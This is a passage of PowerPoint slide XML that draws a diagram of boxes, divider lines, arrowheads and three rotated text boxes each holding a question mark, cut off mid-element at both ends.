            <a:pathLst>
              <a:path h="212089">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="211568"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14308">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="object 128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2255978" y="4414192"/>
            <a:ext cx="129610" cy="193786"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="65405" h="97789">
                <a:moveTo>
                  <a:pt x="65412" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32706" y="97607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65412" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="object 129"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7200960" y="4188361"/>
            <a:ext cx="0" cy="420288"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="212089">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="211568"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14308">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="object 130"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136149" y="4033421"/>
            <a:ext cx="129610" cy="195044"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="65404" h="98425">
                <a:moveTo>
                  <a:pt x="32706" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="98118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65412" y="98118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32706" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="object 131"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="3976908" y="4517840"/>
            <a:ext cx="380695" cy="333425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2556"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2477" b="1" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="2477">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="object 132"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2640000">
            <a:off x="4836790" y="4467513"/>
            <a:ext cx="383346" cy="320601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2546"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2477" b="1" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="2477">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="object 133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4465825" y="4331512"/>
            <a:ext cx="249153" cy="381195"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2477" b="1" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr sz="2477">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="object 134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799722" y="1365984"/>
            <a:ext cx="0" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="622300">
                <a:moveTo>
                  <a:pt x="0" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="object 135"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000236" y="1365984"/>
            <a:ext cx="0" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="622300">
                <a:moveTo>
                  <a:pt x="0" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="object 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201762" y="1365984"/>
            <a:ext cx="0" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="622300">
                <a:moveTo>
                  <a:pt x="0" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="object 137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1402275" y="1365984"/>
            <a:ext cx="0" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="622300">
                <a:moveTo>
                  <a:pt x="0" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="object 138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1603801" y="1365984"/>
            <a:ext cx="0" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="622300">
                <a:moveTo>
                  <a:pt x="0" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="object 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804315" y="1365984"/>
            <a:ext cx="0" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="622300">
                <a:moveTo>
                  <a:pt x="0" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="object 140"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2004828" y="1365984"/>
            <a:ext cx="0" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="622300">
                <a:moveTo>
                  <a:pt x="0" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="object 141"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598196" y="1365984"/>
            <a:ext cx="1580486" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="797560" h="622300">
                <a:moveTo>
                  <a:pt x="398607" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="621929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="797215" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="797215" y="621929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398607" y="621929"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14462">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="object 142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7402488" y="1365984"/>
            <a:ext cx="0" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="622300">
                <a:moveTo>
                  <a:pt x="0" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="object 143"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7602999" y="1365984"/>
            <a:ext cx="0" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="622300">
                <a:moveTo>
                  <a:pt x="0" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="object 144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7803513" y="1365984"/>
            <a:ext cx="0" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="622300">
                <a:moveTo>
                  <a:pt x="0" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="object 145"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8005041" y="1365984"/>
            <a:ext cx="0" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="622300">
                <a:moveTo>
                  <a:pt x="0" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="object 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8205552" y="1365984"/>
            <a:ext cx="0" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="622300">
                <a:moveTo>
                  <a:pt x="0" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="object 147"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407080" y="1365984"/>
            <a:ext cx="0" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="622300">
                <a:moveTo>
                  <a:pt x="0" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="object 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7200960" y="1365984"/>
            <a:ext cx="1348950" cy="1233182"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="680720" h="622300">
                <a:moveTo>
                  <a:pt x="340349" y="621929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="621929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680699" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680699" y="621929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340349" y="621929"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14462">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="object 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7223747" y="3291115"/>
            <a:ext cx="0" cy="406445"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="205105">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="204925"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14820">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="object 150"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7224252" y="3276938"/>
            <a:ext cx="15100" cy="15100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7620" h="7619">
                <a:moveTo>
                  <a:pt x="3577" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7154" y="7154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7154" y="3066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3577" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="object 151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340171" y="3291622"/>
            <a:ext cx="884619" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="446404">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="446133" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14820">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="object 152"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6325993" y="3291115"/>
            <a:ext cx="15100" cy="16359"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7619" h="8255">
                <a:moveTo>
                  <a:pt x="7154" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3066" y="7665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7154" y="7665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7154" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="object 153"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340170" y="2989333"/>
            <a:ext cx="0" cy="302004"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="152400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
